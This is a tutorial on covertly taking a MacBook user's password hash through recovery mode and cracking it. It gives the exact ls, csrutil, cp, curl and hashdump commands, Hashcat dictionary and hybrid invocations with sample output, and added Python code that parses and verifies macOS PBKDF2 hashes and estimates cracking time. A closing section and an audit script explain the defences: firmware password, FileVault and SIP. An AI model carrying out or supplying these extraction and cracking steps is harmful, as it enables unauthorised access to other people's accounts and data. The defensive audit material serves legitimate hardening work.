A powered-off MacBook can be compromised in less than three minutes. With just a few commands, a hacker can extract the target's password hash and crack it without the target's knowledge.
The goal of this article is to acquire the target's .plist file, which contains the password hash. The .plist file is then converted, using a Python script, into a format that Hashcat can interpret, and the password is brute-forced. The simplest method for this attack requires physical access to the target MacBook, recovery mode, a USB flash drive, another MacBook, and Hashcat.
It is also possible to omit the attacker's USB flash drive and MacBook by instead creating a temporary user account on the target MacBook from which the commands can be run; the temporary user can then be deleted. This guide, however, shows the USB flash drive method.
Recovery mode is one of several startup modes supported by Mac devices. It includes a set of tools for reinstalling macOS, resetting account passwords, and configuring a firmware password. The feature is designed to make it easy for users to unlock their account and erase their internal hard drive, but it is often misused by hackers trying to gain unauthorized access to sensitive files.
Since Mojave 10.14, macOS no longer allows users (not even root) to modify the .plist files that contain the password hashes while the operating system is running. This data can now only be captured in recovery mode.
The USB flash drive is needed to move the target's .plist file from the target MacBook to the attacker's. The USB flash drive used in this tutorial is FAT32-formatted, but NTFS and APFS formats should work as well.
The Python script uses some macOS-specific commands to convert the .plist file into a format that Hashcat can interpret. For this reason, another MacBook (or at least another account on the target MacBook) is needed.
To determine the target's Mac password without changing it, the hash must be brute-forced and cracked. macOS protects the target's password well: it is not possible to view user passwords in plain text. CPU-based cracking solutions (like JohnTheRipper) can literally take decades to crack a single hash and are therefore ineffective. Hashcat with a decent GPU is highly recommended.
Step 1: Enable recovery mode
To access recovery mode, first make sure the target MacBook is completely powered off. Then press the power button while holding Command + R on the keyboard. After about 30 seconds, the Apple logo appears and Command + R can be released. When the following screen appears, recovery mode has been successfully activated, and readers can proceed to the next step in this tutorial.
If the MacBook requests a password at this point, the firmware is protected and configured to prevent attacks in recovery mode. Unfortunately, this means that the target MacBook is not vulnerable to the attack described in this article.
Step 2: Disabling SIP (Conditional)
Apple's System Integrity Protection (SIP) is a security feature that prevents parts of macOS from being modified. Since Mojave, the /var/db/dslocal/nodes/Default/ directory falls within the scope of SIP and returns an "operation not permitted" message when someone tries to view it. SIP even prevents root users from accessing and modifying selected directories.
In one test, I found that the Default/ directory could not even be viewed or modified in recovery mode. This was a bit unusual, as other tests allowed access to Default/ without first disabling SIP.
To find out whether SIP needs to be disabled, open a terminal in recovery mode: select "Utilities" and then "Terminal" in the menu bar at the top of the screen. Then run the following ls command, replacing the <volume name> placeholder with the name of the target's macOS volume.
ls -R /Volumes/<volume name>/var/db/dslocal/nodes/Default/
This command recursively (-R) lists the files in the Default/ directory. If the output shows many .plist files, do not disable SIP and proceed to the next step in this tutorial. If the output returns "operation not permitted," disable SIP with the following csrutil command.
csrutil disable
System Integrity Protection has been successfully disabled. Please restart the machine for the changes to take effect.
After the restart prompt appears, shut down and boot back into recovery mode. With SIP disabled, you can proceed to the next step in this tutorial.
Step 3: Extract the Target's .plist
Insert the USB flash drive into the target MacBook. Wait a few seconds for the drive to mount automatically. Then copy the target's .plist file to the USB drive with the following cp command; <volume name>, <username> and <USB drive> are placeholders. The target's .plist is named after the target's username (for example, tokyoneon.plist).
cp /Volumes/<volume name>/var/db/dslocal/nodes/Default/users/<username>.plist /Volumes/<USB drive>/
Make sure to change
Now that the required file has been extracted, the target MacBook can be shut down; the rest of the tutorial requires the attacker's separate MacBook. If SIP was disabled in the previous step, re-enable it with csrutil before shutting down.
Step 4: Copy the plist to the attacker's computer
Connect the USB flash drive containing the target's .plist to the attacker's MacBook and copy (cp) the file to the /tmp/ directory. The /tmp/ directory is hardcoded into the Python script in the next step so that the tutorial is generic enough for all readers to follow. As long as the target's .plist file is in /tmp/, the Python script can convert it to a hash.
cp /Volumes/<USB drive>/<username>.plist /tmp/
Step 5: Download and Run the Hashdump Python Script
The Python script used to convert the extracted .plist file into Hashcat's preferred format was taken from an existing framework and can be found on GitHub. Open a terminal and download the hashdump script with the following curl command. The -o argument saves the script under the file name "hashdump.py".
curl https://raw.githubusercontent.com/tokyoneon/hashdump.py/master/hashdump.py -o hashdump.py
Then make the script executable with the chmod command.
chmod +x hashdump.py
Finally, run the hashdump.py script with root privileges.
sudo python hashdump.py
[('tokyoneon', '$ml$27548$ba6261885e349ecb847854136cf32e9561cd1af65616f7ce11abb3f04786729c$88ad7849c5b30cce20b9d6ecde9e5be3b6736646965e0414d45d40510a574f864bafd9c5dc06fdb3cb189b877c3aa1312c2e4497ea854d3653f5861365d41a4250042a78c93dace17d212ccbb6584e3350efe95bd138f27b1705ad97166d2f11fb749b6138139a9e1ebeecb1a96750db53dbf75434c4b320b500589fa64bf5f8')]
Remove the text surrounding the hash (see below) and save it to a file named hash.txt. Then move hash.txt to the Hashcat machine.
$ml$27548$ba6261885e349ecb847854136cf32e9561cd1af65616f7ce11abb3f04786729c$88ad7849c5b30cce20b9d6ecde9e5be3b6736646965e0414d45d40510a574f864bafd9c5dc06fdb3cb189b877c3aa1312c2e4497ea854d3653f5861365d41a4250042a78c93dace17d212ccbb6584e3350efe95bd138f27b1705ad97166d2f11fb749b6138139a9e1ebeecb1a96750db53dbf75434c4b320b500589fa64bf5f8
To crack the target's hash with Hashcat, use the following command.
hashcat -a 0 -m 7100 /path/to/hash.txt /path/to/wordlist/passwords.txt -w 4 --potfile-path /tmp/cracked_hash.pot
A dictionary attack, or "straight mode," is selected with the argument -a 0. The macOS-specific hash mode is activated with -m 7100, which is required for all macOS hashes extracted from version 10.8 or higher. To improve Hashcat's overall performance, set -w (or --workload-profile) to 4 to maximize cracking speed. Finally, the --potfile-path argument stores the cracked hash in the specified file.
It is also possible to perform hybrid attacks that append digit combinations to the end of each word in the wordlist, for example "password12" and "password77".
hashcat -a 6 -m 7100 /path/to/hash.txt /path/to/wordlists/everyword.txt ?d?d -w 4 --potfile-path /tmp/db.pot
The hybrid attack is activated with the argument -a 6. This time, a wordlist "everyword" containing 479,000 English words is combined with ?d?d, which instructs Hashcat to append every combination of two digits to each word in the wordlist. To append three or four digits, use ?d?d?d or ?d?d?d?d.
While Hashcat is running, the following status data is displayed. If the password is guessed correctly, it will be shown at the bottom of the terminal and Hashcat will stop.
Session..........: hashcat
Status...........: Running
Hash.Type........: macOS v10.8+ (PBKDF2-SHA512)
Hash.Target......: $ml$27548$ba6261885e349ecb847854136cf32e9561cd1af65...d41a42
Guess.Base.......: File (/root/wordlists/passwords.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........: 7740 H/s (98.63ms) @ Accel:256 Loops:64 Thr:512 Vec:1
Recovered........: 0/1 (0.00%) Digests, 0/1 (0.00%) Salts
Progress.........: 0/329968 (0.00%)
Rejected.........: 0/0 (0.00%)
Restore.Point....: 0/329968 (0.00%)
Candidates.#1....: 123456 -> zzzzzzzz99
HWMon.Dev.#1.....: Temp: 57c Fan: 31% Util:100% Core:1873MHz Mem:3802MHz Bus:16
[s]tatus [p]ause [b]ypass [c]heckpoint [q]uit =>
It is hard to predict how long a hash will take to crack. Dictionary and hybrid attacks can take very different amounts of time depending on several factors.
- Wordlist length: A wordlist containing billions of words can take hours, days, or even months to process. For brute-force attacks against macOS hashes, a small, targeted wordlist is recommended.
- Hash iterations: Not all macOS hashes are created equal. Hash iterations are used as a "deceleration factor"; this essentially makes CPUs and GPUs take much longer to compute a single password attempt. The number of iterations varied in my tests against Mojave and High Sierra. In some cases, the iterations were set to 27,000; at other times, over 45,000. Whether this value is random or set per macOS version cannot be deduced from my testing. Certainly, the higher this value is, the longer Hashcat has to work to crack a single hash. With higher iterations, the difference could be between 25,000 and just 1,000 password attempts per second. To find the number of iterations used in the extracted .plist, look at the target's hash again (see below). At the beginning of the hash, the number of iterations (27,548) is found between the second and third dollar sign ($).
$ml$27548$ba6261885e...
- GPU model: An old GeForce GTX 1060 graphics card working on a hash with 27,548 iterations allows ~8,000 password attempts per second. The type of GPU used drastically affects the overall performance of the attack. GPUs older than the GTX 750 Ti are not recommended.
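To make the iteration and keyspace arithmetic above concrete, here is an added Python example that is not the article's hashdump.py and not part of the original post. It parses the $ml$<iterations>$<salt>$<entropy> format shown above, re-derives the entropy for one candidate with PBKDF2-HMAC-SHA512 (the algorithm named in Hashcat's "macOS v10.8+ (PBKDF2-SHA512)" label), times a single derivation to show the deceleration factor, and estimates the worst-case duration of a hybrid ?d?d run over the article's 479,000-word list at the ~8,000 H/s quoted for the GTX 1060. The salt, iteration count and password are constructed demo values; the 32-byte salt and 128-byte entropy lengths match the hash shown in the article. The keyspace helper generalizes to any number of appended digits, not just two.

```python
import hashlib
import hmac
import time

# Constructed demo values (not the article's hash): a 32-byte salt like macOS
# uses, the iteration count shown in the article, and a throwaway password.
DEMO_SALT = bytes(range(32))
DEMO_ITERATIONS = 27548
DEMO_PASSWORD = "correct horse"  # constructed for the demo only


def parse_ml_hash(hash_string: str) -> dict:
    """Split a Hashcat -m 7100 line, $ml$<iterations>$<salt hex>$<entropy hex>, into fields."""
    parts = hash_string.strip().split("$")
    if len(parts) != 5 or parts[0] != "" or parts[1] != "ml":
        raise ValueError("not a $ml$ macOS hash")
    return {
        "iterations": int(parts[2]),
        "salt": bytes.fromhex(parts[3]),
        "entropy": bytes.fromhex(parts[4]),
    }


def make_ml_hash(password: str, salt: bytes, iterations: int, dklen: int = 128) -> str:
    """Derive the entropy with PBKDF2-HMAC-SHA512 and format it as a $ml$ line."""
    entropy = hashlib.pbkdf2_hmac("sha512", password.encode("utf-8"), salt, iterations, dklen=dklen)
    return f"$ml${iterations}${salt.hex()}${entropy.hex()}"


def verify_password(candidate: str, hash_string: str) -> bool:
    """Re-derive the entropy for one candidate and compare it in constant time."""
    fields = parse_ml_hash(hash_string)
    derived = hashlib.pbkdf2_hmac(
        "sha512", candidate.encode("utf-8"), fields["salt"],
        fields["iterations"], dklen=len(fields["entropy"]),
    )
    return hmac.compare_digest(derived, fields["entropy"])


def single_attempt_seconds(hash_string: str) -> float:
    """Wall-clock cost of one derivation on this CPU: the 'deceleration factor' in practice."""
    start = time.perf_counter()
    verify_password("not the password", hash_string)
    return time.perf_counter() - start


def hybrid_keyspace(wordlist_size: int, appended_digits: int) -> int:
    """Candidates tried by hashcat -a 6 <wordlist> ?d...?d: every word times every digit suffix."""
    return wordlist_size * 10 ** appended_digits


def estimated_seconds(keyspace: int, hashes_per_second: float) -> float:
    """Worst-case time to exhaust a keyspace at a given cracking speed."""
    return keyspace / hashes_per_second


if __name__ == "__main__":
    demo_hash = make_ml_hash(DEMO_PASSWORD, DEMO_SALT, DEMO_ITERATIONS)
    fields = parse_ml_hash(demo_hash)
    print(f"iterations={fields['iterations']} salt={len(fields['salt'])} bytes "
          f"entropy={len(fields['entropy'])} bytes")
    print(f"one attempt on this CPU: {single_attempt_seconds(demo_hash):.3f} s")
    space = hybrid_keyspace(479_000, 2)  # the article's 479,000-word list with ?d?d
    print(f"hybrid keyspace {space:,} at 8,000 H/s: "
          f"{estimated_seconds(space, 8000) / 3600:.1f} hours worst case")
```

Read from the defender's side, the estimate is the exposure window for any account whose password is a dictionary word plus two digits once the .plist has left the machine: a few hours on a single consumer GPU, regardless of the iteration count. Raising the iteration count only scales that window linearly, which is why the disk-level protections in the next section matter more than hash strength alone.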
How to Protect Yourself from Attacks in Recovery Mode
There are several ways users can defend against such attacks (see below). For general guidance on protecting macOS, see The Ultimate Guide to Hacking macOS.
- Enable firmware password protection. Set a firmware password to prevent attackers from booting into live USB mode, single-user mode, or recovery mode. The firmware only asks for the additional password at startup when someone attempts to boot the MacBook into single-user mode, the startup manager, target disk mode, or recovery mode. However, a firmware password alone does not protect the hard drive if it is physically removed from the MacBook. Enable disk encryption for more protection.
- Enable FileVault encryption. You can enable FileVault by navigating to System Preferences, then Security & Privacy, and clicking Turn On FileVault (you may need to unlock the settings first). After the process completes, the MacBook restarts and requires a password to unlock the computer each time the Mac starts up. No account is allowed to log in automatically, and a password is also required to access single-user mode. This is the best way to prevent attacks on the encrypted disk even if it is physically removed from the laptop. To protect against attackers with dedicated brute-force hardware, a complex passphrase of more than 21 characters is recommended.
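As an added example that is not part of the original article, the following Python script audits the three protections discussed in this section on a Mac: FileVault via fdesetup status, SIP via csrutil status, and the firmware password via firmwarepasswd -check (which must run as root and applies to Intel Macs, the generation this article targets). The expected fragments are the strings those tools print on a protected machine. The classifier is exposed separately so that output captured from a fleet can be graded offline; that is what the offline grading helper and the embedded sample outputs (constructed) demonstrate.

```python
import shutil
import subprocess

# (label, command, fragment the tool prints when the protection is on)
CHECKS = [
    ("FileVault disk encryption", ["fdesetup", "status"], "FileVault is On"),
    ("System Integrity Protection", ["csrutil", "status"], "status: enabled"),
    ("Firmware password", ["firmwarepasswd", "-check"], "Password Enabled: Yes"),
]


def classify(output: str, expected: str) -> str:
    """PASS when the tool's output contains the protected-state fragment, else FAIL."""
    return "PASS" if expected in output else "FAIL"


def run_check(label: str, argv: list, expected: str) -> tuple:
    """Run one tool on this host; SKIP if the tool is absent (e.g. not on macOS)."""
    if shutil.which(argv[0]) is None:
        return (label, "SKIP", f"{argv[0]} not available on this host")
    try:
        proc = subprocess.run(argv, capture_output=True, text=True, timeout=30)
    except (OSError, subprocess.TimeoutExpired) as exc:
        return (label, "ERROR", str(exc))
    # firmwarepasswd reports permission problems on stderr, so grade both streams
    output = (proc.stdout + proc.stderr).strip()
    return (label, classify(output, expected), output)


def audit() -> list:
    """Live audit of the host running this script."""
    return [run_check(label, argv, expected) for label, argv, expected in CHECKS]


def grade_captured(outputs: dict) -> dict:
    """Grade pre-captured tool output keyed by check label (offline / fleet reports)."""
    return {label: classify(outputs.get(label, ""), expected) for label, _, expected in CHECKS}


# Constructed sample of what an unprotected Intel Mac would report.
SAMPLE_OUTPUTS = {
    "FileVault disk encryption": "FileVault is Off.",
    "System Integrity Protection": "System Integrity Protection status: enabled.",
    "Firmware password": "Password Enabled: No",
}


if __name__ == "__main__":
    for label, verdict, detail in audit():
        print(f"{verdict:5} {label}: {detail}")
    print("sample grading:", grade_captured(SAMPLE_OUTPUTS))
```

A FAIL on either the FileVault or firmware-password line means the recovery-mode procedure described in this article would work against that machine as described: without a firmware password the attacker reaches the recovery terminal, and without FileVault the user .plist files on the system volume are readable from it.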